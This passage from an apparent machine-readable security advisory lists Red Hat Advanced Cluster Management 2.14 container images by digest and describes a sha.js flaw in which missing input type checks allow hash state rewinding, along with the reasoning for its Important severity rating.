"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2389980"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in sha.js, where the hashing implementation does not perform sufficient input type validation. The .update() function accepts arbitrary objects, including those with crafted length properties, which can alter the internal state machine of the hashing process. This flaw may result in unexpected behavior such as rewinding the hash state, producing inconsistent digest outputs, or entering invalid processing loops. The issue was introduced due to the reliance on JavaScript object coercion rules rather than enforcing strict buffer or string inputs.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "sha.js: Missing type checks leading to hash rewind and passing on crafted data",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability was marked as Important rather then Critical because while the lack of input type checks in sha.js allows for hash state rewinding, crafted collisions, and potential denial of service, the vulnerability requires highly specific crafted input objects that are unlikely to occur in typical real-world usage, especially since most applications pass well-formed strings or buffers to hashing functions. Moreover, the cryptographic breakages described, such as nonce reuse leading to private key extraction, are indirect and depend on downstream libraries misusing sha.js for sensitive operations without additional validation layers. As a result, the flaw significantly undermines correctness and robustness of the hashing API, but its exploitability in common production systems is constrained, which could justify viewing it as an Important vulnerability rather than a Critical one.\n\n\nThe flaw requires applications to pass attacker-controlled, 